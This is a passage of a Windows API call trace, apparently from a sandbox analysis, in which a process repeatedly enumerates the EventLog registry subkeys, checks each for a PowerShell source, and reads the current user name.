	[0414.562] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x8, lpName=0x33c760, lpcchName=0x20d378, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x20d378, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0414.562] CoTaskMemFree (pv=0x33c760) 
	[0414.562] CoTaskMemFree (pv=0x0) 
	[0414.562] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3d8 | out: phkResult=0x20d3d8*=0x304) returned 0x0
	[0414.563] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3d8 | out: phkResult=0x20d3d8*=0x0) returned 0x2
	[0414.563] RegOpenKeyExW (in: hKey=0x300, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3d8 | out: phkResult=0x20d3d8*=0x318) returned 0x0
	[0414.563] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3d8 | out: phkResult=0x20d3d8*=0x0) returned 0x2
	[0414.563] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3d8 | out: phkResult=0x20d3d8*=0x1c4) returned 0x0
	[0414.563] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3d8 | out: phkResult=0x20d3d8*=0x0) returned 0x2
	[0414.563] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3d8 | out: phkResult=0x20d3d8*=0x32c) returned 0x0
	[0414.563] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3d8 | out: phkResult=0x20d3d8*=0x0) returned 0x2
	[0414.563] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3d8 | out: phkResult=0x20d3d8*=0x330) returned 0x0
	[0414.563] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3d8 | out: phkResult=0x20d3d8*=0x0) returned 0x2
	[0414.563] RegOpenKeyExW (in: hKey=0x300, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3d8 | out: phkResult=0x20d3d8*=0x334) returned 0x0
	[0414.563] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3d8 | out: phkResult=0x20d3d8*=0x0) returned 0x2
	[0414.564] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3d8 | out: phkResult=0x20d3d8*=0x338) returned 0x0
	[0414.564] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3d8 | out: phkResult=0x20d3d8*=0x0) returned 0x2
	[0414.564] RegOpenKeyExW (in: hKey=0x300, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3d8 | out: phkResult=0x20d3d8*=0x33c) returned 0x0
	[0414.564] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3d8 | out: phkResult=0x20d3d8*=0x0) returned 0x2
	[0414.564] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3d8 | out: phkResult=0x20d3d8*=0x340) returned 0x0
	[0414.564] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d3d8 | out: phkResult=0x20d3d8*=0x344) returned 0x0
	[0414.564] RegCloseKey (hKey=0x344) returned 0x0
	[0414.564] RegCloseKey (hKey=0x300) returned 0x0
	[0414.565] RegCloseKey (hKey=0x340) returned 0x0
	[0414.893] CoTaskMemAlloc (cb=0x804) returned 0x1b92ffd0
	[0414.894] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b92ffd0, nSize=0x20d5e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d5e8) returned 0x1
	[0414.895] CoTaskMemFree (pv=0x1b92ffd0) 
	[0414.897] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0414.897] GetUserNameW (in: lpBuffer=0x33c760, pcbBuffer=0x20d628 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d628) returned 1
	[0414.897] CoTaskMemFree (pv=0x33c760) 
	[0415.628] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d328 | out: phkResult=0x20d328*=0x32c) returned 0x0
	[0415.628] RegQueryInfoKeyW (in: hKey=0x32c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x20d29c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d298, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x20d29c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d298*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.628] CoTaskMemFree (pv=0x0) 
	[0415.628] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.628] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x0, lpName=0x33c760, lpcchName=0x20d328, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x20d328, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.629] CoTaskMemFree (pv=0x33c760) 
	[0415.629] CoTaskMemFree (pv=0x0) 
	[0415.629] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.629] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x1, lpName=0x33c760, lpcchName=0x20d328, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x20d328, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.629] CoTaskMemFree (pv=0x33c760) 
	[0415.629] CoTaskMemFree (pv=0x0) 
	[0415.629] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.629] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x2, lpName=0x33c760, lpcchName=0x20d328, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x20d328, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.629] CoTaskMemFree (pv=0x33c760) 
	[0415.629] CoTaskMemFree (pv=0x0) 
	[0415.629] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.629] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x3, lpName=0x33c760, lpcchName=0x20d328, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x20d328, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.629] CoTaskMemFree (pv=0x33c760) 
	[0415.629] CoTaskMemFree (pv=0x0) 
	[0415.629] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.629] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x4, lpName=0x33c760, lpcchName=0x20d328, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x20d328, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.629] CoTaskMemFree (pv=0x33c760) 
	[0415.629] CoTaskMemFree (pv=0x0) 
	[0415.629] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.629] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x5, lpName=0x33c760, lpcchName=0x20d328, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x20d328, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.629] CoTaskMemFree (pv=0x33c760) 
	[0415.629] CoTaskMemFree (pv=0x0) 
	[0415.629] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.629] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x6, lpName=0x33c760, lpcchName=0x20d328, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x20d328, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.629] CoTaskMemFree (pv=0x33c760) 
	[0415.629] CoTaskMemFree (pv=0x0) 
	[0415.629] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.630] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x7, lpName=0x33c760, lpcchName=0x20d328, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x20d328, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.630] CoTaskMemFree (pv=0x33c760) 
	[0415.630] CoTaskMemFree (pv=0x0) 
	[0415.630] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.630] RegEnumKeyExW (in: hKey=0x32c, dwIndex=0x8, lpName=0x33c760, lpcchName=0x20d328, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x20d328, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.630] CoTaskMemFree (pv=0x33c760) 
	[0415.630] CoTaskMemFree (pv=0x0) 
	[0415.630] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x330) returned 0x0
	[0415.630] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x0) returned 0x2
	[0415.630] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x334) returned 0x0
	[0415.630] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x0) returned 0x2
	[0415.630] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x338) returned 0x0
	[0415.630] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x0) returned 0x2
	[0415.631] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x33c) returned 0x0
	[0415.631] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x0) returned 0x2
	[0415.631] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x2fc) returned 0x0
	[0415.631] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x0) returned 0x2
	[0415.631] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x1c8) returned 0x0
	[0415.631] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x0) returned 0x2
	[0415.631] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x304) returned 0x0
	[0415.631] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x0) returned 0x2
	[0415.631] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x318) returned 0x0
	[0415.631] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x0) returned 0x2
	[0415.632] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x1c4) returned 0x0
	[0415.632] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x348) returned 0x0
	[0415.632] RegCloseKey (hKey=0x348) returned 0x0
	[0415.632] RegCloseKey (hKey=0x32c) returned 0x0
	[0415.632] RegCloseKey (hKey=0x1c4) returned 0x0
	[0415.633] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d328 | out: phkResult=0x20d328*=0x1c4) returned 0x0
	[0415.633] RegQueryInfoKeyW (in: hKey=0x1c4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x20d29c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d298, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x20d29c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d298*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.633] CoTaskMemFree (pv=0x0) 
	[0415.633] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.634] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x0, lpName=0x33c760, lpcchName=0x20d328, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x20d328, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.634] CoTaskMemFree (pv=0x33c760) 
	[0415.634] CoTaskMemFree (pv=0x0) 
	[0415.634] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.634] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x1, lpName=0x33c760, lpcchName=0x20d328, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x20d328, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.634] CoTaskMemFree (pv=0x33c760) 
	[0415.634] CoTaskMemFree (pv=0x0) 
	[0415.634] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.634] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x2, lpName=0x33c760, lpcchName=0x20d328, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x20d328, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.634] CoTaskMemFree (pv=0x33c760) 
	[0415.634] CoTaskMemFree (pv=0x0) 
	[0415.634] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.634] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x3, lpName=0x33c760, lpcchName=0x20d328, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x20d328, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.634] CoTaskMemFree (pv=0x33c760) 
	[0415.634] CoTaskMemFree (pv=0x0) 
	[0415.634] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.634] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x4, lpName=0x33c760, lpcchName=0x20d328, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x20d328, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.634] CoTaskMemFree (pv=0x33c760) 
	[0415.634] CoTaskMemFree (pv=0x0) 
	[0415.634] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.635] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x5, lpName=0x33c760, lpcchName=0x20d328, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x20d328, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.635] CoTaskMemFree (pv=0x33c760) 
	[0415.635] CoTaskMemFree (pv=0x0) 
	[0415.635] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.635] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x6, lpName=0x33c760, lpcchName=0x20d328, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x20d328, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.635] CoTaskMemFree (pv=0x33c760) 
	[0415.635] CoTaskMemFree (pv=0x0) 
	[0415.635] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.635] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x7, lpName=0x33c760, lpcchName=0x20d328, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x20d328, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.635] CoTaskMemFree (pv=0x33c760) 
	[0415.635] CoTaskMemFree (pv=0x0) 
	[0415.635] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.635] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x8, lpName=0x33c760, lpcchName=0x20d328, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x20d328, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.635] CoTaskMemFree (pv=0x33c760) 
	[0415.635] CoTaskMemFree (pv=0x0) 
	[0415.635] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x32c) returned 0x0
	[0415.635] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x0) returned 0x2
	[0415.635] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x348) returned 0x0
	[0415.636] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x0) returned 0x2
	[0415.636] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x34c) returned 0x0
	[0415.636] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x0) returned 0x2
	[0415.636] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x350) returned 0x0
	[0415.636] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x0) returned 0x2
	[0415.636] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x354) returned 0x0
	[0415.636] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x0) returned 0x2
	[0415.636] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x358) returned 0x0
	[0415.636] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x0) returned 0x2
	[0415.637] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x35c) returned 0x0
	[0415.637] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x0) returned 0x2
	[0415.637] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x360) returned 0x0
	[0415.637] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x0) returned 0x2
	[0415.637] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x364) returned 0x0
	[0415.637] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d388 | out: phkResult=0x20d388*=0x368) returned 0x0
	[0415.637] RegCloseKey (hKey=0x368) returned 0x0
	[0415.637] RegCloseKey (hKey=0x1c4) returned 0x0
	[0415.638] RegCloseKey (hKey=0x364) returned 0x0
	[0415.639] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d2f8 | out: phkResult=0x20d2f8*=0x364) returned 0x0
	[0415.639] RegQueryInfoKeyW (in: hKey=0x364, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x20d26c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d268, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x20d26c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x20d268*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.639] CoTaskMemFree (pv=0x0) 
	[0415.639] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.639] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x0, lpName=0x33c760, lpcchName=0x20d2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x20d2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.639] CoTaskMemFree (pv=0x33c760) 
	[0415.639] CoTaskMemFree (pv=0x0) 
	[0415.639] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.639] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x1, lpName=0x33c760, lpcchName=0x20d2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x20d2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.639] CoTaskMemFree (pv=0x33c760) 
	[0415.639] CoTaskMemFree (pv=0x0) 
	[0415.639] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.639] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x2, lpName=0x33c760, lpcchName=0x20d2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x20d2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.639] CoTaskMemFree (pv=0x33c760) 
	[0415.639] CoTaskMemFree (pv=0x0) 
	[0415.639] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.639] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x3, lpName=0x33c760, lpcchName=0x20d2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x20d2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.639] CoTaskMemFree (pv=0x33c760) 
	[0415.639] CoTaskMemFree (pv=0x0) 
	[0415.640] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.640] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x4, lpName=0x33c760, lpcchName=0x20d2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x20d2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.640] CoTaskMemFree (pv=0x33c760) 
	[0415.640] CoTaskMemFree (pv=0x0) 
	[0415.640] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.640] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x5, lpName=0x33c760, lpcchName=0x20d2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x20d2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.640] CoTaskMemFree (pv=0x33c760) 
	[0415.640] CoTaskMemFree (pv=0x0) 
	[0415.640] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.640] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x6, lpName=0x33c760, lpcchName=0x20d2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x20d2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.640] CoTaskMemFree (pv=0x33c760) 
	[0415.640] CoTaskMemFree (pv=0x0) 
	[0415.640] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.640] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x7, lpName=0x33c760, lpcchName=0x20d2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x20d2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.640] CoTaskMemFree (pv=0x33c760) 
	[0415.640] CoTaskMemFree (pv=0x0) 
	[0415.640] CoTaskMemAlloc (cb=0x204) returned 0x33c760
	[0415.640] RegEnumKeyExW (in: hKey=0x364, dwIndex=0x8, lpName=0x33c760, lpcchName=0x20d2f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x20d2f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.640] CoTaskMemFree (pv=0x33c760) 
	[0415.640] CoTaskMemFree (pv=0x0) 
	[0415.640] RegOpenKeyExW (in: hKey=0x364, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d358 | out: phkResult=0x20d358*=0x1c4) returned 0x0
